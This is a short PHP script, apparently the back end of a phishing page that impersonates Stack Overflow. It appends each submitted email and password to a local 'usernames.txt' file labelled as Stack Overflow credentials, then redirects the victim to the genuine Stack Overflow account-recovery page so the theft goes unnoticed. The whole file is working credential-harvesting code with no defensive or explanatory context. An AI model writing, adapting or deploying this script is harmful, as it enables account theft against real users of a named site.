1<?php 2 3file_put_contents("../userpass/usernames.txt", "Stackoverflow Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND); 4header('Location: https://stackoverflow.com/users/account-recovery'); 5exit(); 6?> 7